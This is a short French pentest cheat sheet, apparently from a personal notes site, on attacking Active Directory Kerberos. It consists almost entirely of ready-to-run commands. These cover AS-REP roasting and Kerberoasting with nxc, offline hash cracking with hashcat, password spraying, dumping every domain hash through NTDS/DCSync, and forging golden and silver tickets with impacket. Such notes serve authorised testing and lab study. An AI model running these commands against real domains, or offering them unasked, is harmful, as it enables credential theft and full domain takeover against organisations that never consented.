Whackermelon
notes / active-directory / attaque-kerberos-ad

Attaque Kerberos (AD)

Kerberoast, AS-REP, clock skew.

sommaire

AS-REP Roasting — nxc (comptes sans pré-auth)

nxc ldap 10.10.10.10 -u users.txt -p '' --asreproast asrep.txt   # sans creds
nxc ldap 10.10.10.10 -u user -p pass --asreproast asrep.txt      # avec un compte
hashcat -m 18200 asrep.txt rockyou.txt

Kerberoasting — nxc

nxc ldap 10.10.10.10 -u user -p pass --kerberoasting kerb.txt
nxc ldap 10.10.10.10 -u user -p pass --kerberoast-account svc_sql   # cibler un compte
hashcat -m 13100 kerb.txt rockyou.txt

Password spraying — nxc

nxc smb 10.10.10.10 -u users.txt -p 'Printemps2024!' --continue-on-success

DCSync / dump NTDS — nxc (droits DA/admin requis)

nxc smb 10.10.10.10 -u administrateur -p pass --ntds        # tous les hashes du domaine
nxc smb 10.10.10.10 -u administrateur -H <NThash> --ntds
nxc smb 10.10.10.10 -u administrateur -p pass --ntds --user krbtgt  # seulement krbtgt

Délégations & GMSA — nxc ldap

nxc ldap 10.10.10.10 -u user -p pass --find-delegation
nxc ldap 10.10.10.10 -u user -p pass --trusted-for-delegation
nxc ldap 10.10.10.10 -u user -p pass --gmsa

Golden / Silver Ticket — forge (impacket requis, nxc ne forge pas)

impacket-ticketer -nthash <krbtgt_hash> -domain-sid <SID> -domain domaine.local Administrator
export KRB5CCNAME=Administrator.ccache
nxc smb 10.10.10.10 -k --use-kcache                        # utiliser le ticket forge
# Silver : impacket-ticketer -nthash <service_hash> -domain-sid <SID> -domain dom -spn cifs/serveur user

Horloge (obligatoire)

sudo ntpdate 10.10.10.10

Dans cette section